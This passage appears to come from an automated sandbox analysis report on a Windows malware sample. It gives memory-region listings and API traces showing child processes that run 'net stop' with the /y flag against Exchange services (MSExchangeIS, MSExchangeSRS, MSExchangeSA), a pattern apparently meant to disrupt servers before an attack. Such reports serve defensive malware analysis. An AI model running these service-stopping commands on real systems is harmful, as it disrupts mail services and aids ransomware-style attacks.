entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6920 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6921 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6922 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6923 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6924 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6925 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7032 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 592 os_tid = 0x7b4 [0101.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfd70 | out: lpSystemTimeAsFileTime=0xcfd70*(dwLowDateTime=0xf195c950, dwHighDateTime=0x1d48689)) [0101.356] GetCurrentProcessId () returned 0x130c [0101.356] GetCurrentThreadId () returned 0x7b4 [0101.356] GetTickCount () returned 0x231d8 [0101.356] QueryPerformanceCounter (in: lpPerformanceCount=0xcfd78 | out: lpPerformanceCount=0xcfd78*=1814827400000) returned 1 [0101.357] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0101.357] __set_app_type (_Type=0x1) [0101.357] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0101.357] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0101.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.357] GetConsoleOutputCP () returned 0x1b5 [0101.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0101.357] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.359] sprintf_s (in: _DstBuf=0xcfd18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.359] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.361] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.361] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0101.361] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfab0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.361] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.361] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfd08 | out: Buffer=0xcfd08*=0x234d50) returned 0x0 [0101.361] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfd08 | out: Buffer=0xcfd08*=0x23c100) returned 0x0 [0101.361] _fileno (_File=0x7fefdba2a80) returned 0 [0101.361] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.362] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.362] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.362] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.362] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.362] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.362] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.362] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.362] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.362] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.362] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.362] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.362] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.362] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.362] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.362] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.362] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.362] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.362] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.362] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.362] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.362] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.362] _wcsicmp (_String1="accounts", _String2="MSExchangeIS") returned -12 [0101.362] _wcsicmp (_String1="computer", _String2="MSExchangeIS") returned -10 [0101.362] _wcsicmp (_String1="config", _String2="MSExchangeIS") returned -10 [0101.362] _wcsicmp (_String1="continue", _String2="MSExchangeIS") returned -10 [0101.362] _wcsicmp (_String1="cont", _String2="MSExchangeIS") returned -10 [0101.362] _wcsicmp (_String1="file", _String2="MSExchangeIS") returned -7 [0101.362] _wcsicmp (_String1="files", _String2="MSExchangeIS") returned -7 [0101.362] _wcsicmp (_String1="group", _String2="MSExchangeIS") returned -6 [0101.362] _wcsicmp (_String1="groups", _String2="MSExchangeIS") returned -6 [0101.362] _wcsicmp (_String1="help", _String2="MSExchangeIS") returned -5 [0101.362] _wcsicmp (_String1="helpmsg", _String2="MSExchangeIS") returned -5 [0101.363] _wcsicmp (_String1="localgroup", _String2="MSExchangeIS") returned -1 [0101.363] _wcsicmp (_String1="pause", _String2="MSExchangeIS") returned 3 [0101.363] _wcsicmp (_String1="session", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="sessions", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="sess", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="share", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="start", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="stats", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="statistics", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="stop", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="time", _String2="MSExchangeIS") returned 7 [0101.363] _wcsicmp (_String1="user", _String2="MSExchangeIS") returned 8 [0101.363] _wcsicmp (_String1="users", _String2="MSExchangeIS") returned 8 [0101.363] _wcsicmp (_String1="msg", _String2="MSExchangeIS") returned 2 [0101.363] _wcsicmp (_String1="messenger", _String2="MSExchangeIS") returned -14 [0101.363] _wcsicmp (_String1="receiver", _String2="MSExchangeIS") returned 5 [0101.363] _wcsicmp (_String1="rcv", _String2="MSExchangeIS") returned 5 [0101.363] _wcsicmp (_String1="netpopup", _String2="MSExchangeIS") returned 1 [0101.363] _wcsicmp (_String1="redirector", _String2="MSExchangeIS") returned 5 [0101.363] _wcsicmp (_String1="redir", _String2="MSExchangeIS") returned 5 [0101.363] _wcsicmp (_String1="rdr", _String2="MSExchangeIS") returned 5 [0101.363] _wcsicmp (_String1="workstation", _String2="MSExchangeIS") returned 10 [0101.363] _wcsicmp (_String1="work", _String2="MSExchangeIS") returned 10 [0101.363] _wcsicmp (_String1="wksta", _String2="MSExchangeIS") returned 10 [0101.363] _wcsicmp (_String1="prdr", _String2="MSExchangeIS") returned 3 [0101.363] _wcsicmp (_String1="devrdr", _String2="MSExchangeIS") returned -9 [0101.363] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeIS") returned -1 [0101.363] _wcsicmp (_String1="server", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="svr", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="srv", _String2="MSExchangeIS") returned 6 [0101.363] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeIS") returned -1 [0101.363] _wcsicmp (_String1="alerter", _String2="MSExchangeIS") returned -12 [0101.363] _wcsicmp (_String1="netlogon", _String2="MSExchangeIS") returned 1 [0101.364] _wcsupr (in: _String="MSExchangeIS" | out: _String="MSEXCHANGEIS") returned="MSEXCHANGEIS" [0101.364] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x23ce10 [0101.547] GetServiceKeyNameW (in: hSCManager=0x23ce10, lpDisplayName="MSEXCHANGEIS", lpServiceName=0xff1b5750, lpcchBuffer=0xcfc28 | out: lpServiceName="", lpcchBuffer=0xcfc28) returned 0 [0101.548] _wcsicmp (_String1="msg", _String2="MSEXCHANGEIS") returned 2 [0101.548] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEIS") returned -14 [0101.548] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEIS") returned 5 [0101.548] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEIS") returned 5 [0101.548] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEIS") returned 5 [0101.548] _wcsicmp (_String1="redir", _String2="MSEXCHANGEIS") returned 5 [0101.548] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEIS") returned 5 [0101.548] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEIS") returned 10 [0101.548] _wcsicmp (_String1="work", _String2="MSEXCHANGEIS") returned 10 [0101.548] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEIS") returned 10 [0101.548] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEIS") returned 3 [0101.548] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEIS") returned -9 [0101.548] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEIS") returned -1 [0101.548] _wcsicmp (_String1="server", _String2="MSEXCHANGEIS") returned 6 [0101.548] _wcsicmp (_String1="svr", _String2="MSEXCHANGEIS") returned 6 [0101.548] _wcsicmp (_String1="srv", _String2="MSEXCHANGEIS") returned 6 [0101.548] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEIS") returned -1 [0101.549] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEIS") returned -12 [0101.549] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEIS") returned 1 [0101.549] NetServiceControl (in: servername=0x0, service="MSEXCHANGEIS", opcode=0x0, arg=0x0, bufptr=0xcfc30 | out: bufptr=0xcfc30) returned 0x889 [0101.549] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.549] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0101.550] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.552] GetFileType (hFile=0xb) returned 0x2 [0101.552] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfaf8 | out: lpMode=0xcfaf8) returned 1 [0101.552] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfaf0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0xcfaf0*=0x1e) returned 1 [0101.552] GetFileType (hFile=0xb) returned 0x2 [0101.553] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfaf8 | out: lpMode=0xcfaf8) returned 1 [0101.553] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfaf0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0xcfaf0*=0x2) returned 1 [0101.553] _ultow (in: _Dest=0x889, _Radix=850784 | out: _Dest=0x889) returned="2185" [0101.553] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.553] GetFileType (hFile=0xb) returned 0x2 [0101.554] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfaf8 | out: lpMode=0xcfaf8) returned 1 [0101.554] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfaf0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0xcfaf0*=0x34) returned 1 [0101.554] GetFileType (hFile=0xb) returned 0x2 [0101.554] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfaf8 | out: lpMode=0xcfaf8) returned 1 [0101.554] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfaf0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0xcfaf0*=0x2) returned 1 [0101.555] NetApiBufferFree (Buffer=0x234d50) returned 0x0 [0101.555] NetApiBufferFree (Buffer=0x23c100) returned 0x0 [0101.555] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0101.555] exit (_Code=2) Process: id = "163" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x569e9000" os_pid = "0x420" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeSRS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6926 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6927 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6928 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6929 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6930 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6931 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6932 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6933 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6934 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6935 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6936 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6937 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6938 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6939 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6940 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7159 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7160 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7161 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7162 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 7163 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7164 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7165 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7166 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 7167 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7168 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7169 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7170 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7171 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7172 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7173 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7174 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7175 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7176 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7177 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 593 os_tid = 0x1310 Process: id = "164" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x582d9000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "160" os_parent_pid = "0x12f8" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6941 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6942 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6943 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6944 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6945 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6946 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6947 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6948 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6949 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6950 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6951 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6952 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6953 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 6954 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6955 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6956 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6957 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6958 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6959 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6960 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 6961 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6962 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6963 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6964 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6965 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6966 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6967 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6968 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6969 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6970 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6971 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6972 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6973 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6974 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") 